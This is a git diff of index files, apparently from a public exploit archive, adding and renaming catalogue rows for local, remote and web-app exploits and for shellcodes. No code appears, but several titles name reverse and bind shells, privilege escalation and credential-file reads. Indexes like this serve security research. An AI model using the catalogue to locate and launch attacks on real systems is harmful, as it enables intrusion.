+9483,exploits/windows/local/9483.pl,"Photodex ProShow Gold 4 (Windows XP SP3) - '.psh' Universal Buffer Overflow (SEH)",2009-08-24,corelanc0d3r,local,windows, 9486,exploits/windows/local/9486.pl,"KSP 2006 FINAL - '.m3u' Universal Local Buffer (SEH)",2009-08-24,hack4love,local,windows, 9488,exploits/freebsd/local/9488.c,"FreeBSD 6.1 - 'kqueue()' Null Pointer Dereference Privilege Escalation",2009-08-24,"Przemyslaw Frasunek",local,freebsd, 9489,exploits/multiple/local/9489.txt,"BSD (Multiple Distributions) - 'setusercontext()' Multiple Vulnerabilities",2009-08-24,kingcope,local,multiple, @@ -9648,7 +9651,7 @@ id,file,description,date,author,type,platform,port 44198,exploits/hardware/local/44198.md,"Sony Playstation 4 (PS4) 3.50 < 4.07 - WebKit Code Execution (PoC)",2017-04-08,Specter,local,hardware, 44199,exploits/hardware/local/44199.md,"Sony Playstation 4 (PS4) 3.15 < 3.55 - WebKit Code Execution (PoC)",2016-09-06,"TJ Corley",local,hardware, 44200,exploits/hardware/local/44200.md,"Sony Playstation 4 (PS4) < 2.50 - WebKit Code Execution (PoC)",2016-04-21,"TJ Corley",local,hardware, -44204,exploits/linux/local/44204.md,"WebKitGTK 2.1.2 (Ubuntu 14.04) - Heap based Buffer Overflow",2017-08-19,"Ren Kimura",local,linux, +44204,exploits/linux/local/44204.md,"WebKitGTK 2.1.2 (Ubuntu 14.04) - Heap based Buffer Overflow",2017-08-19,"Ren Kimura",local,linux, 44205,exploits/linux/local/44205.md,"Linux Kernel - 'BadIRET' Local Privilege Escalation",2017-07-24,"Ren Kimura",local,linux, 44206,exploits/hardware/local/44206.c,"Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Kernel Loader",2016-04-27,"Carlos Pizarro",local,hardware, 44224,exploits/windows/local/44224.py,"iSumsoft ZIP Password Refixer 3.1.1 - Buffer Overflow",2018-03-02,ScrR1pTK1dd13,local,windows, @@ -9667,8 +9670,8 @@ id,file,description,date,author,type,platform,port 44279,exploits/linux/local/44279.py,"SC 7.16 - Stack-Based Buffer Overflow",2018-03-12,"Juan Sacco",local,linux, 44282,exploits/hardware/local/44282.txt,"Sony Playstation 4 (PS4) 4.55 < 5.50 - WebKit Code Execution (PoC)",2018-03-10,qwertyoruiop,local,hardware, 44298,exploits/linux/local/44298.c,"Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation",2018-03-16,"Bruce Leidl",local,linux, -44299,exploits/linux/local/44299.c,"Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation",2015-08-26,"Vitaly Nikolenko",local,linux, -44300,exploits/linux/local/44300.c,"Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation",2016-07-04,"Vitaly Nikolenko",local,linux, +44299,exploits/linux/local/44299.c,"Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation",2015-08-26,"Vitaly Nikolenko",local,linux, +44300,exploits/linux/local/44300.c,"Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilter target_offset' Local Privilege Escalation",2016-07-04,"Vitaly Nikolenko",local,linux, 44302,exploits/linux/local/44302.c,"Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation",2017-10-16,"Jeremy Huang",local,linux, 44303,exploits/linux/local/44303.c,"Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation",2017-12-11,anonymous,local,linux, 44306,exploits/hardware/local/44306.c,"Huawei Mate 7 - '/dev/hifi_misc' Privilege Escalation",2016-01-24,pray3r,local,hardware, @@ -9697,8 +9700,8 @@ id,file,description,date,author,type,platform,port 44455,exploits/windows/local/44455.py,"SysGauge Pro 4.6.12 - Local Buffer Overflow (SEH)",2018-04-16,"Hashim Jawad",local,windows, 44470,exploits/windows/local/44470.py,"CloudMe Sync 1.11.0 - Local Buffer Overflow",2018-04-16,"Prasenjit Kanti Paul",local,windows, 44472,exploits/windows_x86/local/44472.py,"Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow PoC",2018-04-17,jollymongrel,local,windows_x86, -44474,exploits/windows/local/44474.txt,"Brave Browser < 0.13.0 - 'long alert() argument' Denial of Service",2018-04-17,"Sahil Tikoo",local,windows, -44475,exploits/windows/local/44475.txt,"Brave Browser < 0.13.0 - 'window.close(self)' Denial of Service",2018-04-17,"Sahil Tikoo",local,windows, +44474,exploits/windows/local/44474.txt,"Brave Browser < 0.13.0 - 'long alert() argument' Denial of Service",2018-04-17,"Sahil Tikoo",local,windows, +44475,exploits/windows/local/44475.txt,"Brave Browser < 0.13.0 - 'window.close(self)' Denial of Service",2018-04-17,"Sahil Tikoo",local,windows, 44476,exploits/windows/local/44476.py,"AMD Plays.tv 1.27.5.0 - 'plays_service.exe' Arbitrary File Execution",2018-04-15,Securifera,local,windows, 44477,exploits/windows/local/44477.py,"Reaper 5.78 - Local Buffer Overflow",2018-04-17,bzyo,local,windows, 44478,exploits/windows_x86/local/44478.cpp,"Microsoft Window Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation",2018-03-26,xiaodaozhi,local,windows_x86, @@ -9731,6 +9734,7 @@ id,file,description,date,author,type,platform,port 44690,exploits/android/local/44690.txt,"MakeMyTrip 7.2.4 - Information Disclosure",2018-05-22,"Divya Jain",local,android, 44696,exploits/linux/local/44696.rb,"Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation (Metasploit)",2018-05-22,Metasploit,local,linux, 44697,exploits/windows/local/44697.txt,"Microsoft Windows - 'POP/MOV SS' Privilege Escalation",2018-05-22,"Can Bölük",local,windows, +44713,exploits/windows/local/44713.py,"FTPShell Server 6.80 - Buffer Overflow (SEH)",2018-05-23,"Hashim Jawad",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -16467,7 +16471,7 @@ id,file,description,date,author,type,platform,port 44283,exploits/hardware/remote/44283.py,"MikroTik RouterOS < 6.38.4 (MIPSBE) - 'Chimay Red' Stack Clash Remote Code Execution",2018-03-12,"Lorenzo Santina",remote,hardware, 44284,exploits/hardware/remote/44284.py,"MikroTik RouterOS < 6.38.4 (x86) - 'Chimay Red' Stack Clash Remote Code Execution",2018-03-12,"Lorenzo Santina",remote,hardware, 44290,exploits/hardware/remote/44290.py,"MikroTik RouterOS < 6.41.3/6.42rc27 - SMB Buffer Overflow",2018-03-15,CoreLabs,remote,hardware, -44292,exploits/windows/remote/44292.py,"SAP NetWeaver AS JAVA CRM - Log injection Remote Command Execution",2018-03-14,"erp scan team",remote,windows, +44292,exploits/windows/remote/44292.py,"SAP NetWeaver AS JAVA CRM - Log injection Remote Command Execution",2018-03-14,"erp scan team",remote,windows, 44293,exploits/windows/remote/44293.html,"Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows, 44294,exploits/windows/remote/44294.html,"Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows, 44297,exploits/linux/remote/44297.py,"Unitrends UEB 10.0 - Unauthenticated Root Remote Code Execution",2018-03-16,"Jared Arave",remote,linux, @@ -16476,7 +16480,7 @@ id,file,description,date,author,type,platform,port 44356,exploits/windows/remote/44356.rb,"GitStack - Unsanitized Argument Remote Code Execution (Metasploit)",2018-03-29,Metasploit,remote,windows, 44357,exploits/windows/remote/44357.rb,"Exodus Wallet (ElectronJS Framework) - Remote Code Execution (Metasploit)",2018-03-29,Metasploit,remote,windows, 44376,exploits/windows/remote/44376.py,"Advantech WebAccess < 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow",2018-03-30,"Chris Lyne",remote,windows,4592 -44398,exploits/hardware/remote/44398.py,"Moxa AWK-3131A 1.4 < 1.7 - 'Username' OS Command Injection",2017-04-03,Talos,remote,hardware, +44398,exploits/hardware/remote/44398.py,"Moxa AWK-3131A 1.4 < 1.7 - 'Username' OS Command Injection",2017-04-03,Talos,remote,hardware, 44412,exploits/multiple/remote/44412.py,"Adobe Flash < 28.0.0.161 - Use-After-Free",2018-04-06,SyFi,remote,multiple, 44415,exploits/android/remote/44415.txt,"LineageOS 14.1 Blueborne - Remote Code Execution",2018-04-06,"Marcin Kozlowski",remote,android, 44446,exploits/hardware/remote/44446.py,"F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure",2017-02-14,@0x00string,remote,hardware, @@ -39259,7 +39263,7 @@ id,file,description,date,author,type,platform,port 44429,exploits/json/webapps/44429.txt,"CyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution",2018-04-09,"RedTeam Pentesting",webapps,json, 44430,exploits/xml/webapps/44430.txt,"KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection",2018-04-09,LiquidWorm,webapps,xml, 44431,exploits/linux/webapps/44431.txt,"KYOCERA Net Admin 3.4 - Cross-Site Request Forgery (Add Admin)",2018-04-09,LiquidWorm,webapps,linux, -44432,exploits/php/webapps/44432.txt,"Buddypress Xprofile Custom Fields Type 2.6.3 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php, +44432,exploits/php/webapps/44432.txt,"Buddypress Xprofile Custom Fields Type 2.6.3 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php, 44433,exploits/php/webapps/44433.txt,"WooCommerce CSV-Importer-Plugin 3.3.6 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php, 44434,exploits/php/webapps/44434.txt,"iScripts SonicBB 1.0 - Reflected Cross-Site Scripting (PoC)",2018-04-09,ManhNho,webapps,php, 44435,exploits/php/webapps/44435.txt,"WordPress Plugin Google Drive 2.2 - Remote Code Execution",2018-04-09,"Lenon Leite",webapps,php, @@ -39270,10 +39274,10 @@ id,file,description,date,author,type,platform,port 44441,exploits/linux/webapps/44441.txt,"Dell EMC Avamar and Integrated Data Protection Appliance Installation Manager - Invalid Access Control",2018-04-10,SlidingWindow,webapps,linux, 44443,exploits/php/webapps/44443.txt,"WordPress Plugin File Upload 4.3.2 - Stored Cross-Site Scripting",2018-04-10,ManhNho,webapps,php, 44444,exploits/php/webapps/44444.txt,"WordPress Plugin File Upload 4.3.3 - Stored Cross-Site Scripting (PoC)",2018-04-10,ManhNho,webapps,php, -44447,exploits/php/webapps/44447.txt,"Joomla Convert Forms version 2.0.3 - Formula Injection (CSV Injection)",2018-04-12,"Sairam Jetty",webapps,php, -44448,exploits/php/webapps/44448.py,"Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)",2018-04-13,"Vitalii Rudnykh",webapps,php, +44447,exploits/php/webapps/44447.txt,"Joomla Convert Forms version 2.0.3 - Formula Injection (CSV Injection)",2018-04-12,"Sairam Jetty",webapps,php, +44448,exploits/php/webapps/44448.py,"Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC)",2018-04-13,"Vitalii Rudnykh",webapps,php, 44450,exploits/linux/webapps/44450.txt,"MikroTik 6.41.4 - FTP daemon Denial of Service PoC",2018-04-13,FarazPajohan,webapps,linux, -44449,exploits/php/webapps/44449.rb,"Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution",2018-04-13,"Hans Topo & g0tmi1k",webapps,php, +44449,exploits/php/webapps/44449.rb,"Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution",2018-04-13,"Hans Topo & g0tmi1k",webapps,php, 44454,exploits/php/webapps/44454.txt,"Cobub Razor 0.8.0 - SQL injection",2018-04-16,Kyhvedn,webapps,php,80 44469,exploits/jsp/webapps/44469.txt,"Sophos Cyberoam UTM CR25iNG - 10.6.3 MR-5 - Direct Object Reference",2018-04-16,Frogy,webapps,jsp, 44471,exploits/php/webapps/44471.txt,"Joomla! Component jDownloads 3.2.58 - Cross Site Scripting",2018-04-17,"Sureshbabu Narvaneni",webapps,php, @@ -39370,7 +39374,7 @@ id,file,description,date,author,type,platform,port 44679,exploits/php/webapps/44679.txt,"Auto Dealership & Vehicle Showroom WebSys 1.0 - Multiple Vulnerabilities",2018-05-21,L0RD,webapps,php, 44681,exploits/linux/webapps/44681.txt,"Merge PACS 7.0 - Cross-Site Request Forgery",2018-05-21,"Safak Aslan",webapps,linux, 44682,exploits/php/webapps/44682.txt,"Model Agency Media House & Model Gallery 1.0 - Multiple Vulnerabilities",2018-05-21,L0RD,webapps,php, -44683,exploits/php/webapps/44683.txt,"Wchat PHP AJAX Chat Script 1.5 - Cross-Site Scripting",2018-05-21,L0RD,webapps,php, +44683,exploits/php/webapps/44683.txt,"Wchat PHP AJAX Chat Script 1.5 - Cross-Site Scripting",2018-05-21,L0RD,webapps,php, 44684,exploits/hardware/webapps/44684.txt,"Nordex N149/4.0-4.5 - SQL Injection",2018-05-22,t4rkd3vilz,webapps,hardware, 44686,exploits/php/webapps/44686.txt,"WebSocket Live Chat - Cross-Site Scripting",2018-05-22,"Alireza Norkazemi",webapps,php, 44687,exploits/linux/webapps/44687.txt,"Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting",2018-05-22,t4rkd3vilz,webapps,linux, @@ -39383,3 +39387,29 @@ id,file,description,date,author,type,platform,port 44701,exploits/php/webapps/44701.txt,"Feedy RSS News Ticker 2.0 - 'cat' SQL Injection",2018-05-22,AkkuS,webapps,php, 44702,exploits/php/webapps/44702.txt,"NewsBee CMS 1.4 - 'download.php' SQL Injection",2018-05-22,AkkuS,webapps,php, 44703,exploits/php/webapps/44703.txt,"Easy File Uploader 1.7 - SQL Injection / Cross-Site Scripting",2018-05-22,AkkuS,webapps,php, +44706,exploits/php/webapps/44706.txt,"EasyService Billing 1.0 - SQL Injection / Cross-Site Scripting",2018-05-23,AkkuS,webapps,php, +44707,exploits/php/webapps/44707.txt,"EasyService Billing 1.0 - 'p1' SQL Injection",2018-05-23,AkkuS,webapps,php, +44708,exploits/php/webapps/44708.txt,"MySQL Smart Reports 1.0 - 'id' SQL Injection / Cross-Site Scripting",2018-05-23,AkkuS,webapps,php, +44709,exploits/php/webapps/44709.txt,"MySQL Blob Uploader 1.7 - 'download.php' SQL Injection / Cross-Site Scripting",2018-05-23,AkkuS,webapps,php, +44710,exploits/php/webapps/44710.txt,"MySQL Blob Uploader 1.7 - 'home-file-edit.php' SQL Injection / Cross-Site Scripting",2018-05-23,AkkuS,webapps,php, +44711,exploits/php/webapps/44711.txt,"MySQL Blob Uploader 1.7 - 'home-filet-edit.php' SQL Injection / Cross-Site Scripting",2018-05-23,AkkuS,webapps,php, +44712,exploits/php/webapps/44712.txt,"MySQL Blob Uploader 1.7 - 'home-filet-edit.php' SQL Injection",2018-05-23,AkkuS,webapps,php, +44714,exploits/php/webapps/44714.txt,"PHP Dashboards 4.5 - 'email' SQL Injection",2018-05-23,AkkuS,webapps,php, +44716,exploits/php/webapps/44716.txt,"Mobile Card Selling Platform 1 - Cross-Site Request Forgery",2018-05-23,L0RD,webapps,php, +44715,exploits/php/webapps/44715.txt,"PHP Dashboards 4.5 - SQL Injection",2018-05-23,AkkuS,webapps,php, +44719,exploits/php/webapps/44719.txt,"Online Store System CMS 1.0 - SQL Injection",2018-05-23,AkkuS,webapps,php, +44718,exploits/php/webapps/44718.txt,"Gigs 2.0 - 'username' SQL Injection",2018-05-23,AkkuS,webapps,php, +44720,exploits/php/webapps/44720.txt,"GPSTracker 1.0 - 'id' SQL Injection",2018-05-23,AkkuS,webapps,php, +44722,exploits/php/webapps/44722.txt,"Shipping System CMS 1.0 - SQL Injection",2018-05-23,AkkuS,webapps,php, +44725,exploits/php/webapps/44725.txt,"Wecodex Store Paypal 1.0 - SQL Injection",2018-05-23,AkkuS,webapps,php, +44726,exploits/php/webapps/44726.txt,"SAT CFDI 3.3 - SQL Injection",2018-05-23,AkkuS,webapps,php, +44727,exploits/php/webapps/44727.txt,"School Management System CMS 1.0 - 'username' SQL Injection",2018-05-23,AkkuS,webapps,php, +44728,exploits/php/webapps/44728.txt,"Library CMS 1.0 - SQL Injection",2018-05-23,AkkuS,webapps,php, +44729,exploits/php/webapps/44729.txt,"Wecodex Hotel CMS 1.0 - 'Admin Login' SQL Injection",2018-05-23,AkkuS,webapps,php, +44730,exploits/php/webapps/44730.txt,"Wecodex Restaurant CMS 1.0 - 'Login' SQL Injection",2018-05-23,AkkuS,webapps,php, +44732,exploits/php/webapps/44732.txt,"eWallet Online Payment Gateway 2 - Cross-Site Request Forgery",2018-05-23,L0RD,webapps,php, +44733,exploits/php/webapps/44733.txt,"Mcard Mobile Card Selling Platform 1 - SQL Injection",2018-05-23,L0RD,webapps,php, +44734,exploits/linux/webapps/44734.txt,"Honeywell Scada System - Information Disclosure",2018-05-23,t4rkd3vilz,webapps,linux, +44735,exploits/php/webapps/44735.txt,"NewsBee CMS 1.4 - Cross-Site Request Forgery",2018-05-23,indoushka,webapps,php, +44736,exploits/hardware/webapps/44736.txt,"SKT LTE Wi-Fi SDT-CW3B1 - Unauthorized Admin Credential Change",2018-05-23,"Safak Aslan",webapps,hardware, +44737,exploits/php/webapps/44737.txt,"WordPress Plugin Peugeot Music - Arbitrary File Upload",2018-05-23,Mr.7z,webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index d78b9470c..04c7bf3cf 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1,33 +1,33 @@ id,file,description,date,author,type,platform 14113,shellcodes/arm/14113.c,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm 13241,shellcodes/aix/13241.c,"AIX - execve(/bin/sh) Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",shellcode,aix -13242,shellcodes/bsd/13242.txt,"BSD - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes)",2000-11-19,Scrippie,shellcode,bsd +13242,shellcodes/bsd/13242.txt,"BSD - Reverse (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes)",2000-11-19,Scrippie,shellcode,bsd 13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve(/bin/sh) Shellcode (128 bytes)",2004-09-26,Palante,shellcode,bsd_ppc 13244,shellcodes/bsd_x86/13244.c,"BSD/x86 - setuid(0) + execve(/bin/sh) Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86 -13245,shellcodes/bsd_x86/13245.c,"BSD/x86 - setuid(0) + Bind TCP (31337/TCP) Shell Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86 +13245,shellcodes/bsd_x86/13245.c,"BSD/x86 - setuid(0) + Bind (31337/TCP) Shell Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",shellcode,bsd_x86 13246,shellcodes/bsd_x86/13246.c,"BSD/x86 - execve(/bin/sh) Shellcode (27 bytes)",2004-09-26,n0gada,shellcode,bsd_x86 13247,shellcodes/bsd_x86/13247.c,"BSD/x86 - execve(/bin/sh) + setuid(0) Shellcode (29 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86 -13248,shellcodes/bsd_x86/13248.c,"BSD/x86 - Bind TCP (31337/TCP) Shell Shellcode (83 bytes)",2004-09-26,no1,shellcode,bsd_x86 -13249,shellcodes/bsd_x86/13249.c,"BSD/x86 - Bind TCP (Random TCP Port) Shell Shellcode (143 bytes)",2004-09-26,MayheM,shellcode,bsd_x86 +13248,shellcodes/bsd_x86/13248.c,"BSD/x86 - Bind (31337/TCP) Shell Shellcode (83 bytes)",2004-09-26,no1,shellcode,bsd_x86 +13249,shellcodes/bsd_x86/13249.c,"BSD/x86 - Bind (Random TCP Port) Shell Shellcode (143 bytes)",2004-09-26,MayheM,shellcode,bsd_x86 13250,shellcodes/bsd_x86/13250.c,"BSD/x86 - Break chroot Shellcode (45 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86 13251,shellcodes/bsd_x86/13251.c,"BSD/x86 - execve(/bin/sh) Encoded Shellcode (49 bytes)",2004-09-26,dev0id,shellcode,bsd_x86 13252,shellcodes/bsd_x86/13252.c,"BSD/x86 - execve(/bin/sh) + Encoded Shellcode (57 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86 -13254,shellcodes/bsd_x86/13254.c,"BSD/x86 - Reverse TCP (torootteam.host.sk:2222/TCP) Shell Shellcode (93 bytes)",2004-09-26,dev0id,shellcode,bsd_x86 +13254,shellcodes/bsd_x86/13254.c,"BSD/x86 - Reverse (torootteam.host.sk:2222/TCP) Shell Shellcode (93 bytes)",2004-09-26,dev0id,shellcode,bsd_x86 13255,shellcodes/bsd_x86/13255.c,"BSD/x86 - execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes)",2004-09-26,"Matias Sedalo",shellcode,bsd_x86 -13256,shellcodes/bsd/13256.c,"BSD/x86 - Reverse TCP (192.168.2.33:6969/TCP) Shell Shellcode (129 bytes)",2004-09-26,"Sinan Eren",shellcode,bsd +13256,shellcodes/bsd/13256.c,"BSD/x86 - Reverse (192.168.2.33:6969/TCP) Shell Shellcode (129 bytes)",2004-09-26,"Sinan Eren",shellcode,bsd 13257,shellcodes/bsdi_x86/13257.c,"BSDi/x86 - execve(/bin/sh) Shellcode (45 bytes)",2004-09-26,duke,shellcode,bsdi_x86 13258,shellcodes/bsdi_x86/13258.c,"BSDi/x86 - execve(/bin/sh) Shellcode (46 bytes)",2004-09-26,vade79,shellcode,bsdi_x86 13260,shellcodes/bsdi_x86/13260.c,"BSDi/x86 - execve(/bin/sh) + ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,shellcode,bsdi_x86 13261,shellcodes/freebsd/13261.c,"FreeBSD x86 / x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes)",2009-04-13,c0d3_z3r0,shellcode,freebsd 13262,shellcodes/freebsd_x86/13262.txt,"FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes)",2008-09-12,suN8Hclf,shellcode,freebsd_x86 -13263,shellcodes/freebsd_x86/13263.txt,"FreeBSD/x86 - Reverse TCP (192.168.1.33:8000/TCP) cat /etc/passwd Shellcode (112 bytes)",2008-09-10,suN8Hclf,shellcode,freebsd_x86 +13263,shellcodes/freebsd_x86/13263.txt,"FreeBSD/x86 - Reverse (192.168.1.33:8000/TCP) cat /etc/passwd Shellcode (112 bytes)",2008-09-10,suN8Hclf,shellcode,freebsd_x86 13264,shellcodes/freebsd_x86/13264.txt,"FreeBSD/x86 - Kill All Processes Shellcode (12 bytes)",2008-09-09,suN8Hclf,shellcode,freebsd_x86 13265,shellcodes/freebsd_x86/13265.c,"FreeBSD/x86 - Reverse Connection (172.17.0.9:8000/TCP) + Receive Shellcode + Payload Loader + Return Results Null-Free Shellcode (90 bytes)",2008-09-05,sm4x,shellcode,freebsd_x86 13266,shellcodes/freebsd_x86/13266.asm,"FreeBSD/x86 - execve(/bin/cat /etc/master.passwd) + Null-Free Shellcode (65 bytes)",2008-08-25,sm4x,shellcode,freebsd_x86 -13267,shellcodes/freebsd_x86/13267.asm,"FreeBSD/x86 - Reverse TCP (127.0.0.1:8000/TCP) Shell (/bin/sh) + Null-Free Shellcode (89 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86 +13267,shellcodes/freebsd_x86/13267.asm,"FreeBSD/x86 - Reverse (127.0.0.1:8000/TCP) Shell (/bin/sh) + Null-Free Shellcode (89 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86 13268,shellcodes/freebsd_x86/13268.asm,"FreeBSD/x86 - setuid(0) + execve(ipf -Fa) Shellcode (57 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86 13269,shellcodes/freebsd_x86/13269.c,"FreeBSD/x86 - execve(/bin/sh) Encoded Shellcode (48 bytes)",2008-08-19,c0d3_z3r0,shellcode,freebsd_x86 -13270,shellcodes/freebsd_x86/13270.c,"FreeBSD/x86 - Bind TCP (4883/TCP) Shell (/bin/sh) + Password Shellcode (222 bytes)",2006-07-19,MahDelin,shellcode,freebsd_x86 +13270,shellcodes/freebsd_x86/13270.c,"FreeBSD/x86 - Bind (4883/TCP) Shell (/bin/sh) + Password Shellcode (222 bytes)",2006-07-19,MahDelin,shellcode,freebsd_x86 13271,shellcodes/freebsd_x86/13271.c,"FreeBSD/x86 - reboot(RB_AUTOBOOT) Shellcode (7 bytes)",2006-04-19,IZ,shellcode,freebsd_x86 13272,shellcodes/freebsd_x86/13272.c,"FreeBSD/x86 - execve(/bin/sh) Shellcode (23 bytes) (1)",2006-04-14,IZ,shellcode,freebsd_x86 13273,shellcodes/freebsd_x86/13273.c,"FreeBSD/x86 - execve(/bin/sh) Shellcode (23 bytes) (2)",2004-09-26,marcetam,shellcode,freebsd_x86 @@ -35,15 +35,15 @@ id,file,description,date,author,type,platform 13275,shellcodes/freebsd_x86/13275.c,"FreeBSD/x86 - Load Kernel Module (/sbin/kldload /tmp/o.o) Shellcode (74 bytes)",2004-09-26,dev0id,shellcode,freebsd_x86 13276,shellcodes/freebsd_x86/13276.c,"FreeBSD/x86 - chown 0:0 + chmod 6755 + execve(/tmp/sh) Shellcode (44 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,freebsd_x86 13277,shellcodes/freebsd_x86/13277.c,"FreeBSD/x86 - execve(/tmp/sh) Shellcode (34 bytes)",2004-09-26,"Claes M. Nyberg",shellcode,freebsd_x86 -13278,shellcodes/freebsd_x86/13278.asm,"FreeBSD/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (102 bytes)",2004-09-26,Scrippie,shellcode,freebsd_x86 +13278,shellcodes/freebsd_x86/13278.asm,"FreeBSD/x86 - Reverse (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (102 bytes)",2004-09-26,Scrippie,shellcode,freebsd_x86 13279,shellcodes/freebsd_x86-64/13279.c,"FreeBSD/x64 - exec /bin/sh Shellcode (31 bytes)",2009-05-18,"Hack'n Roll",shellcode,freebsd_x86-64 13280,shellcodes/freebsd_x86-64/13280.c,"FreeBSD/x64 - execve(/bin/sh) Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,shellcode,freebsd_x86-64 13281,shellcodes/generator/13281.c,"Linux/x86 - execve() + Null-Free Shellcode (Generator)",2009-06-29,certaindeath,shellcode,generator -13282,shellcodes/generator/13282.php,"Linux/x86 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator -13283,shellcodes/generator/13283.php,"Windows (XP SP1) - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator +13282,shellcodes/generator/13282.php,"Linux/x86 - Bind (/TCP) Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator +13283,shellcodes/generator/13283.php,"Windows (XP SP1) - Bind (/TCP) Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",shellcode,generator 13284,shellcodes/generator/13284.txt,"Linux - execve(/bin/sh) + Polymorphic + Printable ASCII Characters Shellcode (Generator)",2008-08-31,sorrow,shellcode,generator 13285,shellcodes/generator/13285.c,"Linux/x86 - Command Generator + Null-Free Shellcode (Generator)",2008-08-19,BlackLight,shellcode,generator -13286,shellcodes/generator/13286.c,"Windows - Reverse TCP (127.0.0.1:123/TCP) Shell + Alphanumeric Shellcode (Encoder/Decoder) (Generator)",2008-08-04,"Avri Schneider",shellcode,generator +13286,shellcodes/generator/13286.c,"Windows - Reverse (127.0.0.1:123/TCP) Shell + Alphanumeric Shellcode (Encoder/Decoder) (Generator)",2008-08-04,"Avri Schneider",shellcode,generator 13288,shellcodes/generator/13288.c,"Linux/x86 - HTTP/1.x Requests Shellcode (18+/26+ bytes) (Generator)",2006-10-22,izik,shellcode,generator 13289,shellcodes/generator/13289.c,"Windows/x86 - Multi-Format Encoding Tool Shellcode (Generator)",2005-12-16,Skylined,shellcode,generator 13290,shellcodes/ios/13290.txt,"iOS Version-independent - Null-Free Shellcode",2008-08-21,"Andy Davis",shellcode,ios @@ -52,29 +52,29 @@ id,file,description,date,author,type,platform 13293,shellcodes/hardware/13293.asm,"Cisco IOS - New TTY + Privilege Level To 15 + No Password Shellcode",2008-08-13,"Gyan Chawdhary",shellcode,hardware 13295,shellcodes/hp-ux/13295.c,"HP-UX - execve(/bin/sh) Shellcode (58 bytes)",2004-09-26,K2,shellcode,hp-ux 13296,shellcodes/linux_x86-64/13296.c,"Linux/x64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes)",2008-11-28,gat3way,shellcode,linux_x86-64 -13297,shellcodes/generator/13297.c,"Linux/x64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator)",2006-04-21,phar,shellcode,generator -13298,shellcodes/linux_mips/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind TCP (4919/TCP) Shell (/bin/sh) Shellcode (276 bytes)",2008-08-18,vaicebine,shellcode,linux_mips +13297,shellcodes/generator/13297.c,"Linux/x64 - Reverse (/TCP) Shell (/bin/bash) + Semi-Stealth 